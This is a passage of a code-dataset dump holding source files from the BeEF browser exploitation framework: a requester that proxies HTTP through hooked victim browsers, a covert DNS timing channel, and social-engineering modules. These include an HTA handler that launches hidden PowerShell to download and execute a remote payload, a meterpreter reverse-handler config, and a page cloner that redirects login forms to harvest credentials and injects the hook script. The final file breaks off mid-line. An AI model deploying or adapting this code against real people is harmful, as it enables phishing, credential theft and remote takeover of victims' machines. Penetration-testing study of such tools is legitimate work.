language
stringlengths
0
24
filename
stringlengths
9
214
code
stringlengths
99
9.93M
Ruby
beef/extensions/requester/api.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module Requester module RegisterHttpHandler BeEF::API::Registrar.instance.register(BeEF::Extension::Requester::RegisterHttpHandler, BeEF::API::Server, 'mount_handler') def self.mount_handler(beef_server) beef_server.mount('/requester', BeEF::Extension::Requester::Handler) beef_server.mount('/api/requester', BeEF::Extension::Requester::RequesterRest.new) end end module RegisterPreHookCallback BeEF::API::Registrar.instance.register(BeEF::Extension::Requester::RegisterPreHookCallback, BeEF::API::Server::Hook, 'pre_hook_send') def self.pre_hook_send(hooked_browser, body, _params, _request, _response) dhook = BeEF::Extension::Requester::API::Hook.new dhook.requester_run(hooked_browser, body) end end end end end
YAML
beef/extensions/requester/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: extension: requester: name: 'Requester' enable: false authors: ["antisnatchor", "scotty"]
Ruby
beef/extensions/requester/extension.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module Requester end end end require 'extensions/requester/models/http' require 'extensions/requester/api/hook' require 'extensions/requester/handler' require 'extensions/requester/api' require 'extensions/requester/rest/requester'
Ruby
beef/extensions/requester/handler.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module Requester # # The http handler that manages the Requester. # class Handler H = BeEF::Core::Models::Http Z = BeEF::Core::Models::HookedBrowser def initialize(data) @data = data setup end def setup # validates the hook token beef_hook = @data['beefhook'] || nil if beef_hook.nil? print_error 'beefhook is null' return end # validates the request id request_id = @data['cid'].to_s if request_id == '' print_error 'Original request id (command id) is null' return end unless BeEF::Filters.nums_only?(request_id) print_error 'Original request id (command id) is invalid' return end # validates that a hooked browser with the beef_hook token exists in the db zombie_db = Z.where(session: beef_hook).first || nil if zombie_db.nil? (print_error 'Invalid beefhook id: the hooked browser cannot be found in the database' return) end # validates that we have such a http request saved in the db http_db = H.where(id: request_id.to_i, hooked_browser_id: zombie_db.session).first || nil if http_db.nil? print_error 'Invalid http_db: no such request found in the database' return end # validates that the http request has not been run before if http_db.has_ran.eql? 'complete' (print_error 'This http request has been saved before' return) end # validates the response code response_code = @data['results']['response_status_code'] || nil if response_code.nil? (print_error 'Http response code is null' return) end # save the results in the database http_db.response_headers = @data['results']['response_headers'] http_db.response_status_code = @data['results']['response_status_code'] http_db.response_status_text = @data['results']['response_status_text'] http_db.response_port_status = @data['results']['response_port_status'] http_db.response_data = @data['results']['response_data'] http_db.response_date = Time.now http_db.has_ran = 'complete' # Store images as binary # see issue https://github.com/beefproject/beef/issues/449 http_db.response_data = http_db.response_data.unpack('a*') if http_db.response_headers =~ /Content-Type: image/ http_db.save end end end end end
Ruby
beef/extensions/requester/api/hook.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module Requester module API require 'uri' class Hook include BeEF::Core::Handlers::Modules::BeEFJS # If the HTTP table contains requests that need to be sent (has_ran = waiting), retrieve # and send them to the hooked browser. def requester_run(hb, body) @body = body # Generate all the requests and output them to the hooked browser output = [] print_debug hb.to_json BeEF::Core::Models::Http.where(hooked_browser_id: hb.session, has_ran: 'waiting').each do |h| output << requester_parse_db_request(h) end return if output.empty? config = BeEF::Core::Configuration.instance ws = BeEF::Core::Websocket::Websocket.instance evasion = BeEF::Extension::Evasion::Evasion.instance if config.get('beef.extension.evasion.enable') # TODO: antisnatchor: prevent sending "content" multiple times. # Better leaving it after the first run, and don't send it again. # todo antisnatchor: remove this gsub crap adding some hook packing. # If we use WebSockets, just reply wih the component contents if config.get('beef.http.websocket.enable') && ws.getsocket(hb.session) content = File.read(find_beefjs_component_path('beef.net.requester')).gsub('// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file \'doc/COPYING\' for copying permission //', '') add_to_body output if config.get('beef.extension.evasion.enable') ws.send(evasion.obfuscate(content) + @body, hb.session) else ws.send(content + @body, hb.session) end # if we use XHR-polling, add the component to the main hook file else build_missing_beefjs_components 'beef.net.requester' # Send the command to perform the requests to the hooked browser add_to_body output end end def add_to_body(output) config = BeEF::Core::Configuration.instance req = %{ beef.execute(function() { beef.net.requester.send( #{output.to_json} ); }); } if config.get('beef.extension.evasion.enable') evasion = BeEF::Extension::Evasion::Evasion.instance @body << evasion.obfuscate(req) else @body << req end end # # Converts an HTTP db object into an Hash that follows the representation # of input data for the beef.net.request Javascript API function. # The Hash will then be converted into JSON, given as input to beef.net.requester.send Javascript API function # and finally sent to and executed by the hooked browser. def requester_parse_db_request(http_db_object) allow_cross_domain = http_db_object.allow_cross_domain.to_s verb = http_db_object.method.upcase proto = http_db_object.proto.downcase uri = http_db_object.request.split(/\s+/)[1] headers = {} req_parts = http_db_object.request.split(/\r?\n/) @host = http_db_object.domain @port = http_db_object.port print_debug 'http_db_object:' print_debug http_db_object.to_json # @note: retrieve HTTP headers values needed later, and the \r\n that indicates the start of the post-data (if any) req_parts.each_with_index do |value, index| @content_length = Integer(req_parts[index].split(/:\s+/)[1]) if value.match(/^Content-Length:\s+(\d+)/) @post_data_index = index if value.eql?('') || value.strip.empty? # this will be the CRLF (before HTTP request body) end # @note: add HTTP request headers to an Hash req_parts.each_with_index do |value, index| if verb.eql?('POST') if index.positive? && (index < @post_data_index) # only add HTTP headers, not the verb/uri/version or post-data header_key = value.split(/: /)[0] header_value = value.split(/: /)[1] headers[header_key] = header_value end elsif index.positive? header_key = value.split(/: /)[0] header_value = value.split(/: /)[1] headers[header_key] = header_value # only add HTTP headers, not the verb/uri/version end end # set default port if nil if @port.nil? @port = if uri.to_s =~ /^https?/ # absolute uri.match(/^https:/) ? 443 : 80 else # relative proto.eql?('https') ? 443 : 80 end end # Build request http_request_object = { 'id' => http_db_object.id, 'method' => verb, 'proto' => proto, 'host' => @host, 'port' => @port, 'uri' => uri, 'headers' => headers, 'allowCrossDomain' => allow_cross_domain } # Add POST request data if !@content_length.nil? && @content_length.positive? post_data_sliced = req_parts.slice(@post_data_index + 1, req_parts.length) @post_data = post_data_sliced.join http_request_object['data'] = @post_data end # @note: parse HTTP headers Hash, adding them to the object that will be used by beef.net.requester.send headers.each_key { |key| http_request_object['headers'][key] = headers[key] } print_debug 'result http_request_object' print_debug http_request_object.to_json http_request_object end end end end end end
Ruby
beef/extensions/requester/models/http.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Core module Models # # Table stores the http requests and responses from the requester. # class Http < BeEF::Core::Model # # Removes a request/response from the data store # def self.delete(id) if id.to_s !~ /\A\d+\z/ (print_error 'Failed to remove response. Invalid response ID.' return) end r = BeEF::Core::Models::Http.find(id.to_i) if r.nil? (print_error "Failed to remove response [id: #{id}]. Response does not exist." return) end r.destroy end end end end end
Ruby
beef/extensions/requester/rest/requester.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module Requester # This class handles the routing of RESTful API requests for the requester class RequesterRest < BeEF::Core::Router::Router # Filters out bad requests before performing any routing before do config = BeEF::Core::Configuration.instance # Require a valid API token from a valid IP address halt 401 unless params[:token] == config.get('beef.api_token') halt 403 unless BeEF::Core::Rest.permitted_source?(request.ip) H = BeEF::Core::Models::Http HB = BeEF::Core::Models::HookedBrowser headers 'Content-Type' => 'application/json; charset=UTF-8', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Expires' => '0' end # Returns a request by ID get '/request/:id' do id = params[:id] raise InvalidParamError, 'id' unless BeEF::Filters.nums_only?(id) requests = H.find(id) halt 404 if requests.nil? result = {} result[:count] = requests.length result[:requests] = [] requests.each do |request| result[:requests] << request2hash(request) end result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while retrieving request with id #{id} (#{e.message})" halt 500 end # Returns all requestes given a specific hooked browser id get '/requests/:id' do id = params[:id] raise InvalidParamError, 'id' unless BeEF::Filters.is_valid_hook_session_id?(id) requests = H.where(hooked_browser_id: id) halt 404 if requests.nil? result = {} result[:count] = requests.length result[:requests] = [] requests.each do |request| result[:requests] << request2hash(request) end result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while retrieving request list for hooked browser with id #{id} (#{e.message})" halt 500 end # Return a response by ID get '/response/:id' do # super debugging error = {} error[:code] = 0 id = params[:id] raise InvalidParamError, 'id' unless BeEF::Filters.nums_only?(id) error[:code] = 1 responses = H.find(id) || nil error[:code] = 2 halt 404 if responses.nil? error[:code] = 3 result = {} result[:success] = 'true' error[:code] = 4 result[:result] = response2hash(responses) error[:code] = 5 result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while retrieving response with id #{id} (#{e.message})" error[:id] = id error[:message] = e.message error.to_json # halt 500 end # Deletes a specific response given its id delete '/response/:id' do id = params[:id] raise InvalidParamError, 'id' unless BeEF::Filters.nums_only?(id) responses = H.find(id) || nil halt 404 if responses.nil? result = {} result['success'] = H.delete(id) result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while removing response with id #{id} (#{e.message})" halt 500 end # Send a new HTTP request to the hooked browser post '/send/:id' do id = params[:id] proto = params[:proto].to_s || 'http' raw_request = params['raw_request'].to_s zombie = HB.where(session: id).first || nil halt 404 if zombie.nil? # @TODO: move most of this to the model raise InvalidParamError, 'raw_request' if raw_request == '' raise InvalidParamError, 'raw_request: Invalid request URL scheme' if proto !~ /\Ahttps?\z/ req_parts = raw_request.split(/ |\n/) verb = req_parts[0] raise InvalidParamError, 'raw_request: Only HEAD, GET, POST, OPTIONS, PUT or DELETE requests are supported' unless BeEF::Filters.is_valid_verb?(verb) uri = req_parts[1] raise InvalidParamError, 'raw_request: Invalid URI' unless BeEF::Filters.is_valid_url?(uri) version = req_parts[2] raise InvalidParamError, 'raw_request: Invalid HTTP version' unless BeEF::Filters.is_valid_http_version?(version) host_str = req_parts[3] raise InvalidParamError, 'raw_request: Invalid HTTP version' unless BeEF::Filters.is_valid_host_str?(host_str) # Validate target hsot host = req_parts[4] host_parts = host.split(/:/) host_name = host_parts[0] host_port = host_parts[1] || nil raise InvalidParamError, 'raw_request: Invalid HTTP HostName' unless BeEF::Filters.is_valid_hostname?(host_name) host_port = host_parts[1] || nil if host_port.nil? || !BeEF::Filters.nums_only?(host_port) host_port = proto.eql?('https') ? 443 : 80 end # Save the new HTTP request http = H.new( hooked_browser_id: zombie.session, request: raw_request, method: verb, proto: proto, domain: host_name, port: host_port, path: uri, request_date: Time.now, allow_cross_domain: 'true' ) print_debug "added new http request for #{zombie.session}" print_debug http.to_json if verb.eql?('POST') || verb.eql?('PUT') req_parts.each_with_index do |value, index| http.content_length = req_parts[index + 1] if value.match(/^Content-Length/i) end end http.save result = request2hash(http) print_debug "[Requester] Sending HTTP request through zombie [ip: #{zombie.ip}] : #{result}" # result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while removing network host with id #{id} (#{e.message})" halt 500 end # Convert a request object to Hash def request2hash(http) { id: http.id, proto: http.proto, domain: http.domain, port: http.port, path: http.path, has_ran: http.has_ran, method: http.method, request_date: http.request_date, response_date: http.response_date, response_status_code: http.response_status_code, response_status_text: http.response_status_text, response_port_status: http.response_port_status } end # Convert a response object to Hash def response2hash(http) response_data = '' unless http.response_data.nil? if (http.response_data.length > (1024 * 100)) # more than 100K response_data = http.response_data[0..(1024 * 100)] response_data += "\n<---------- Response Data Truncated---------->" else response_data = http.response_data end end response_headers = '' response_headers = http.response_headers unless http.response_headers.nil? { id: http.id, request: http.request.force_encoding('UTF-8'), response: response_data.force_encoding('UTF-8'), response_headers: response_headers.force_encoding('UTF-8'), proto: http.proto.force_encoding('UTF-8'), domain: http.domain.force_encoding('UTF-8'), port: http.port.force_encoding('UTF-8'), path: http.path.force_encoding('UTF-8'), date: http.request_date, has_ran: http.has_ran.force_encoding('UTF-8') } end # Raised when invalid JSON input is passed to an /api/requester handler. class InvalidJsonError < StandardError DEFAULT_MESSAGE = 'Invalid JSON input passed to /api/requester handler'.freeze def initialize(message = nil) super(message || DEFAULT_MESSAGE) end end # Raised when an invalid named parameter is passed to an /api/requester handler. class InvalidParamError < StandardError DEFAULT_MESSAGE = 'Invalid parameter passed to /api/requester handler'.freeze def initialize(message = nil) str = 'Invalid "%s" parameter passed to /api/requester handler' message = format str, message unless message.nil? super(message) end end end end end end
Ruby
beef/extensions/s2c_dns_tunnel/api.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module ServerClientDnsTunnel module API module ServerClientDnsTunnelHandler BeEF::API::Registrar.instance.register(BeEF::Extension::ServerClientDnsTunnel::API::ServerClientDnsTunnelHandler, BeEF::API::Server, 'pre_http_start') BeEF::API::Registrar.instance.register(BeEF::Extension::ServerClientDnsTunnel::API::ServerClientDnsTunnelHandler, BeEF::API::Server, 'mount_handler') # Starts the S2C DNS Tunnel server at BeEF startup. # @param http_hook_server [BeEF::Core::Server] HTTP server instance def self.pre_http_start(_http_hook_server) configuration = BeEF::Core::Configuration.instance zone = configuration.get('beef.extension.s2c_dns_tunnel.zone') raise ArgumentError, 'zone name is undefined' unless zone.to_s != '' # if listen parameter is not defined in the config.yaml then interface with the highest BeEF's IP-address will be choosen listen = configuration.get('beef.extension.s2c_dns_tunnel.listen') Socket.ip_address_list.map { |x| listen = x.ip_address if x.ipv4? } if listen.to_s.empty? port = 53 protocol = :udp interfaces = [[protocol, listen, port]] dns = BeEF::Extension::ServerClientDnsTunnel::Server.instance dns.run(listen: interfaces, zone: zone) print_info "Server-to-Client DNS Tunnel Server: #{listen}:#{port} (#{protocol})" info = '' info += "Zone: #{zone}\n" print_more info end # Mounts the handler for processing HTTP image requests. # @param beef_server [BeEF::Core::Server] HTTP server instance def self.mount_handler(beef_server) configuration = BeEF::Core::Configuration.instance zone = configuration.get('beef.extension.s2c_dns_tunnel.zone') beef_server.mount('/tiles', BeEF::Extension::ServerClientDnsTunnel::Httpd.new(zone)) end end end end end end
YAML
beef/extensions/s2c_dns_tunnel/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: extension: s2c_dns_tunnel: enable: false name: 'Server-to-Client DNS Tunnel' authors: ['dnkolegov','afr1ka'] # Define which network interface DNS server should listen. IP-address of this interface will be used in DNS answers. # By default, DNS server will be started on the interface which has a highest IP-address and will listen UDP 53 port only. # listen: '' # Zone managed by DNS server. DNS server will not be started if zone is not specified zone: ''
Ruby
beef/extensions/s2c_dns_tunnel/dnsd.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module ServerClientDnsTunnel module RubyDNS class Transaction def fail!(rcode, domain) append_question! @answer.rcode = if rcode.is_a? Symbol Resolv::DNS::RCode.const_get(rcode) else rcode.to_i end return unless rcode == :NXDomain @answer.aa = 1 soa = Resolv::DNS::Resource::IN::SOA.new(Resolv::DNS::Name.create("ns.#{domain}"), Resolv::DNS::Name.create("hostmaster.#{domain}"), Time.now.strftime('%Y%m%d%H').to_i, 86_400, 7200, 3_600_000, 172_800) @answer.add_authority(name, 3600, soa) end end end class Server < RubyDNS::Server include Singleton attr_accessor :messages def initialize super() @lock = Mutex.new end # Starts the custom DNS server. # # @param options [Hash] server configuration options # @option options [Array<Array>] :zone - zone manged by BeEF DNS server for data exfiltration # @option options [Array<Array>] :listen - local interfaces to listen on def run(options = {}) @lock.synchronize do Thread.new do EventMachine.next_tick do listen = options[:listen] || nil super(listen: listen) @selfip = options[:listen][0][1] @zone = options[:zone] @messages = {} end end end end # Entry point for processing incoming DNS requests. # # @param name [String] name of the resource record being looked up # @param resource [Resolv::DNS::Resource::IN] query type (e.g. A, CNAME, NS, etc.) # @param transaction [RubyDNS::Transaction] internal RubyDNS class detailing DNS question/answer def process(name, resource, transaction) @lock.synchronize do print_debug "Received DNS request (name: #{name} type: #{format_resource(resource)})" if (format_resource(resource) != 'A') || !name.match(/#{@zone}$/) transaction.fail!(:Refused, @zone) return end # Parce query name in accordance with Active Directory SRV resource records cid = name.split('.')[2].split('-')[2].to_i bit = name.split('.')[2].split('-')[3].to_i(16) if @messages[cid].nil? transaction.fail!(:NXDomain, @zone) return else message = @messages[cid] end if message.length <= bit transaction.fail!(:NXDomain, @zone) return end # If the bit is equal to 1 we should return one of the BeEF's IP addresses case message[bit] when '1' transaction.respond!(@selfip) return # If the bit is equal to 0 we should return NXDomain message when '0' transaction.fail!(:NXDomain, @zone) return end end end private # Helper method that formats the given resource class in a human-readable format. # # @param resource [Resolv::DNS::Resource::IN] resource class # @return [String] resource name stripped of any module/class names def format_resource(resource) /::(\w+)$/.match(resource.name)[1] end end end end end
Ruby
beef/extensions/s2c_dns_tunnel/extension.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module ServerClientDnsTunnel extend BeEF::API::Extension @short_name = 'S2C DNS Tunnel' @full_name = 'Server-to-Client DNS Tunnel' @description = 'This extension provides a custom BeEF DNS server and HTTP server ' \ 'that implement unidirectional covert timing channel from BeEF communication server to zombie browser.' end end end require 'extensions/s2c_dns_tunnel/dnsd' require 'extensions/s2c_dns_tunnel/api' require 'extensions/s2c_dns_tunnel/httpd'
Ruby
beef/extensions/s2c_dns_tunnel/httpd.rb
module BeEF module Extension module ServerClientDnsTunnel class Httpd < Sinatra::Base def initialize(domain) super() @domain = domain end get '/map' do if request.host.match("^_ldap\._tcp\.[0-9a-z\-]+\.domains\._msdcs\.#{@domain}$") path = File.dirname(__FILE__) send_file File.join(path, 'pixel.jpg') end end end end end end require 'sinatra/base'
YAML
beef/extensions/social_engineering/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: extension: social_engineering: enable: false name: 'Social Engineering' authors: ["antisnatchor"] web_cloner: # NOTE: you must have 'wget' in your PATH add_beef_hook: true user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" verify_ssl: true powershell: # the default payload being used is windows/meterpreter/reverse_https msf_reverse_handler_host: "172.16.45.1" msf_reverse_handler_port: "443" powershell_handler_url: "/ps"
Ruby
beef/extensions/social_engineering/extension.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module RegisterSEngHandler def self.mount_handler(server) server.mount('/api/seng', BeEF::Extension::SocialEngineering::SEngRest.new) ps_url = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.powershell_handler_url') server.mount(ps_url.to_s, BeEF::Extension::SocialEngineering::Bind_powershell.new) end end module SocialEngineering extend BeEF::API::Extension @short_name = 'social_engineering' @full_name = 'Social Engineering' @description = 'Web page cloner and other social engineering tools.' BeEF::API::Registrar.instance.register(BeEF::Extension::RegisterSEngHandler, BeEF::API::Server, 'mount_handler') end end end # Handlers require 'extensions/social_engineering/web_cloner/web_cloner' require 'extensions/social_engineering/web_cloner/interceptor' require 'extensions/social_engineering/powershell/bind_powershell' # Models require 'extensions/social_engineering/models/web_cloner' require 'extensions/social_engineering/models/interceptor' # RESTful api endpoints require 'extensions/social_engineering/rest/socialengineering'
Text
beef/extensions/social_engineering/droppers/readme.txt
This directory will contain the droppers (executables, JARs, browser extensions, etc..) that you want to have available on the BeEF server. For example, if you want to have bin.exe available at http://beefserver/bin.exe, use the following RESTful API call: curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mount":"/bin.exe", "local_file":"/extensions/social_engineering/droppers/bin.exe"}' -X POST http://beefserver/api/server/bind?token=<token>
Ruby
beef/extensions/social_engineering/models/interceptor.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Core module Models class Interceptor < BeEF::Core::Model belongs_to :webcloner end end end end
Ruby
beef/extensions/social_engineering/models/web_cloner.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Core module Models class WebCloner < BeEF::Core::Model has_many :interceptors end end end end
Ruby
beef/extensions/social_engineering/powershell/bind_powershell.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module SocialEngineering # # By default powershell will be served from http://beef_server:beef_port/ps/ps.png # # NOTE: make sure you change the 'beef.http.public' settings in the main BeEF config.yaml to the public IP address / hostname for BeEF, # and also the powershell-related variable in extensions/social_engineering/config.yaml, # and also write your PowerShell payload to extensions/social_engineering/powershell/powershell_payload. class Bind_powershell < BeEF::Core::Router::Router before do headers 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Expires' => '0' end # serves the HTML Application (HTA) get '/hta' do response['Content-Type'] = 'application/hta' @config = BeEF::Core::Configuration.instance beef_url_str = @config.beef_url_str ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url') payload_url = "#{beef_url_str}#{ps_url}/ps.png" print_info "Serving HTA. Powershell payload will be retrieved from: #{payload_url}" "<script> var c = \"cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c \\\"\\\"IEX ((new-object net.webclient).downloadstring('#{payload_url}')); Invoke-ps\\\"\\\"\"; new ActiveXObject('WScript.Shell').Run(c); </script>" end # serves the powershell payload after modifying LHOST/LPORT # The payload gets served via HTTP by default. Serving it via HTTPS it's still a TODO get '/ps.png' do response['Content-Type'] = 'text/plain' @ps_lhost = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.msf_reverse_handler_host') @ps_port = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.msf_reverse_handler_port') ps_payload_path = "#{$root_dir}/extensions/social_engineering/powershell/powershell_payload" if File.exist?(ps_payload_path) return File.read(ps_payload_path).to_s.gsub('___LHOST___', @ps_lhost).gsub('___LPORT___', @ps_port) end nil end end end end end
Ruby
beef/extensions/social_engineering/rest/socialengineering.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module SocialEngineering class SEngRest < BeEF::Core::Router::Router config = BeEF::Core::Configuration.instance before do error 401 unless params[:token] == config.get('beef.api_token') halt 401 unless BeEF::Core::Rest.permitted_source?(request.ip) headers 'Content-Type' => 'application/json; charset=UTF-8', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Expires' => '0' end # Example: curl -H "Content-Type: application/json; charset=UTF-8" -d json_body # -X POST http://127.0.0.1:3000/api/seng/clone_page?token=851a937305f8773ee82f5259e792288cdcb01cd7 # # Example json_body: # { # "url": "https://accounts.google.com/ServiceLogin?service=mail&continue=https://mail.google.com/mail/" # "mount": "/gmail", # "dns_spoof": true # } post '/clone_page' do request.body.rewind begin body = JSON.parse request.body.read uri = body['url'] mount = body['mount'] use_existing = body['use_existing'] dns_spoof = body['dns_spoof'] if !uri.nil? && !mount.nil? if (uri =~ URI::DEFAULT_PARSER.make_regexp).nil? # invalid URI print_error 'Invalid URI' halt 401 end unless mount[%r{^/}] # mount needs to start with / print_error 'Invalid mount (need to be a relative path, and start with / )' halt 401 end web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance success = web_cloner.clone_page(uri, mount, use_existing, dns_spoof) if success result = { 'success' => true, 'mount' => mount }.to_json else result = { 'success' => false }.to_json halt 500 end end rescue StandardError print_error 'Invalid JSON input passed to endpoint /api/seng/clone_page' error 400 # Bad Request end end end end end end
Ruby
beef/extensions/social_engineering/web_cloner/interceptor.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module SocialEngineering require 'sinatra/base' class Interceptor < Sinatra::Base configure do set :show_exceptions, false end # intercept GET get '/' do print_info "GET request from IP #{request.ip}" print_info "Referer: #{request.referer}" cloned_page = settings.cloned_page cloned_page end # intercept POST post '/' do print_info "POST request from IP #{request.ip}" request.body.rewind data = request.body.read print_info 'Intercepted data:' print_info data interceptor_db = BeEF::Core::Models::Interceptor.new( webcloner_id: settings.db_entry.id, post_data: data, ip: request.ip ) interceptor_db.save if settings.frameable print_info 'Page can be framed :-) Loading original URL into iFrame...' "<html><head><script type=\"text/javascript\" src=\"#{settings.beef_hook}\"></script>\n</head></head><body><iframe src=\"#{settings.redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>" else print_info 'Page can not be framed :-) Redirecting to original URL...' redirect settings.redirect_to end end end end end end
Ruby
beef/extensions/social_engineering/web_cloner/web_cloner.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module SocialEngineering class WebCloner require 'socket' include Singleton def initialize @http_server = BeEF::Core::Server.instance @config = BeEF::Core::Configuration.instance @cloned_pages_dir = "#{File.expand_path('../../../extensions/social_engineering/web_cloner', __dir__)}/cloned_pages/" @beef_hook = @config.hook_url.to_s end def clone_page(url, mount, use_existing, dns_spoof) print_info "Cloning page at URL #{url}" uri = URI(url) output = uri.host output_mod = "#{output}_mod" user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent') success = false # Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser, # there is no need to implement the complex logic to handle all different cases. # We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification. # So ideally, if the the page needs custom modifications, the web_cloner usage will be the following: # 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file # - the user modify the example.com_mod file manually # 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file # if use_existing.nil? || use_existing == false begin cmd = ['wget', url.to_s, '-c', '-k', '-O', (@cloned_pages_dir + output).to_s, '-U', user_agent.to_s, '--read-timeout', '60', '--tries', '3'] cmd << '--no-check-certificate' unless @config.get('beef.extension.social_engineering.web_cloner.verify_ssl') print_debug "Running command: #{cmd.join(' ')}" IO.popen(cmd, 'r+') do |wget_io| end success = true rescue Errno::ENOENT print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH." rescue StandardError => e print_error "Errors executing wget: #{e}" end if success File.open((@cloned_pages_dir + output_mod).to_s, 'w') do |out_file| File.open((@cloned_pages_dir + output).to_s, 'r').each do |line| # Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF if line.include?('<form ') || line.include?('<FORM ') line_attrs = line.split(' ') c = 0 cc = 0 # TODO: probably doable also with map! # modify the form 'action' attribute line_attrs.each do |attr| if attr.include? 'action="' print_info "Form action found: #{attr}" break end c += 1 end line_attrs[c] = "action=\"#{mount}\"" # TODO: to be tested, needed in case like yahoo # delete the form 'onsubmit' attribute # line_attrs.each do |attr| # if attr.include? "onsubmit=" # print_info "Form onsubmit event found: #{attr}" # break # end # cc += 1 # end # line_attrs[cc] = "" mod_form = line_attrs.join(' ') print_info 'Form action value changed in order to be intercepted :-D' out_file.print mod_form # Add the BeEF hook elsif (line.include?('</head>') || line.include?('</HEAD>')) && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook') out_file.print add_beef_hook(line) print_info 'BeEF hook added :-D' else out_file.print line end end end end end if File.size((@cloned_pages_dir + output).to_s).zero? print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'." return false end print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]" file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve # Split the URL mounting only the path and ignoring the query string. # If the user wants to clone http://example.local/login.jsp?example=123&test=456 # then the phishing link can be used anyway with all the proper parameters to look legit. mount = mount.split('?').first if mount.include?('?') mount = mount.split(';').first if mount.include?(';') interceptor = BeEF::Extension::SocialEngineering::Interceptor interceptor.set :redirect_to, url interceptor.set :frameable, url_is_frameable?(url) interceptor.set :beef_hook, @beef_hook interceptor.set :cloned_page, get_page_content(file_path) interceptor.set :db_entry, persist_page(url, mount) # Add a DNS record spoofing the address of the cloned webpage as the BeEF server if dns_spoof dns = BeEF::Extension::Dns::Server.instance ipv4 = Socket.ip_address_list.detect { |ai| ai.ipv4? && !ai.ipv4_loopback? }.ip_address ipv6 = Socket.ip_address_list.detect { 